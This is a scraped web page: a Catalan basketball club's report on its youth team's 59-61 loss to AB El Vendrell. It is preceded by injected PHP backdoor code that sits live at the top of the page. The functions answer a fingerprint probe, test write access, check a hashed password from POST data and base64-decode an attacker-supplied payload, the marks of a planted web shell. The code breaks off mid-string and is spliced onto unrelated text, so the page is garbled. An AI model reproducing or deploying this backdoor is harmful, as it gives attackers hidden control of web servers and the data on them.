function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil masculí A fa uns últims deu minuts de cine però no pot vèncer l'AB El Vendrell (59-61) - Tgn Bàsquet Club -

L’infantil masculí A fa uns últims deu minuts de cine però no pot vèncer l’AB El Vendrell (59-61)

Updated: novembre 20, 2018

L’equip infantil masculí A va quedar-se amb la mel als llavis contra l’AB El Vendrell. El conjunt que entrena Laureà Català va fer uns últims deu minuts espectaculars (22-8) contra un rival molt superior físicament —un aspecte que es repeteix en cada partit de l’infantil A—. Així, tot i uns primers minuts d’intercanvi de cistelles, els tarragonins van fallar massa tirs del minut 5 al 10 i els visitants van obrir forat (12-21). La millora defensiva del TGN Bàsquet en el segon quart va ser insuficient per a retallar diferències perquè el Vendrell va tancar la seva defensa —jugadors més alts— i al descans 22-31. La represa no va ser bona pels liles que van encaixar un parcial de 0-8 de sortida i al final del tercer quart el resultat era de 37-53. Aleshores, el TGN Bàsquet va intensificar la seva defensa, va recuperar pilotes i va anotar amb fluïdesa. A falta d’un minut pel final el resultat era de 59-61 però els locals van desaprofitar fins a tres possessions per a forçar la pròrroga o guanyar el partit.